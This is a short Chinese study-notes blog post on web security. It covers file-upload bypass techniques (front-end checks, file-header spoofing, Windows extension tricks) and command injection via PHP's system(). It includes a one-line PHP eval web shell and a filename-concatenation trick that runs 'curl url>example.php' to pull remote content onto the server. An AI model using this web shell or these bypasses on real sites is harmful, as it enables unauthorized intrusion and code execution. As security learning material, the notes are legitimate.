DAY2

作者: iWhitee | 来源:发表于2019-01-23 10:01 被阅读0次

一 文件上传

1.未做任何过滤
直接上传php文件即可()
<?php @eval($_POST['shell']);
2.前端绕过(前端javascript验证绕过)
burp抓包修改后缀名
3.幻数限制(文件头限制)
在php文件前加判定的头名称
4.黑名单限制(win系统下)
可通过win系统下自动将文件后缀名中的.和空格进行删除,来绕过。

二 代码命令执行漏洞

1.命令执行漏洞
调用system函数,可以执行Ubuntu中的命令(eg:ls/whoami)


图片1.png

2.案例(执行:curl url>eample.php)——此案例需将环境搭建在Ubuntu系统中


image.png
可以用名称拼接的方式
 ls -t(以时间传输的方式排列当前文件夹下的文件)
 ls -t>a(将文件名拼接成一个命令,放入a文件中)
 sh a(执行a命令)
 (之后可以查看我们从执行的curl url>emample.php命令后example.php文件)    

相关文章

网友评论

      本文标题:DAY2

      本文链接:https://www.haomeiwen.com/subject/yagkjqtx.html